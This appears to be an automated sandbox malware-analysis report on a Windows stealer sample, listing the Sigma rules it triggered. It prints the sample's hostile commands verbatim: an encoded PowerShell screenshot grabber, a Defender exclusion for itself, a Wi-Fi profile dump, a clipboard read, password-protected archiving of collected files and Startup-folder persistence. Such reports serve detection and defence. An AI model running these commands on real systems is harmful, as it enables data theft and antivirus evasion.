              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 3540, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", ProcessId: 1476, ProcessName: cmd.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Use Short Name Path in Command Line
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 5528, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP", ProcessId: 7256, ProcessName: cvtres.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3920, TargetFilename: C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *, CommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6828, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *, ProcessId: 2564, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1476, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe', ProcessId: 7268, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 1476, ProcessName: cmd.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: X9g8L63QGs.exeReversingLabs: Detection: 47%
              Source: X9g8L63QGs.exeVirustotal: Detection: 67%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: X9g8L63QGs.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,97_2_00007FF7080A901C
              Source: X9g8L63QGs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: X9g8L63QGs.exe, 00000007.00000002.1710702996.00007FFB0B9BF000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BE52000.00000040.00000001.01000000.00000010.sdmp
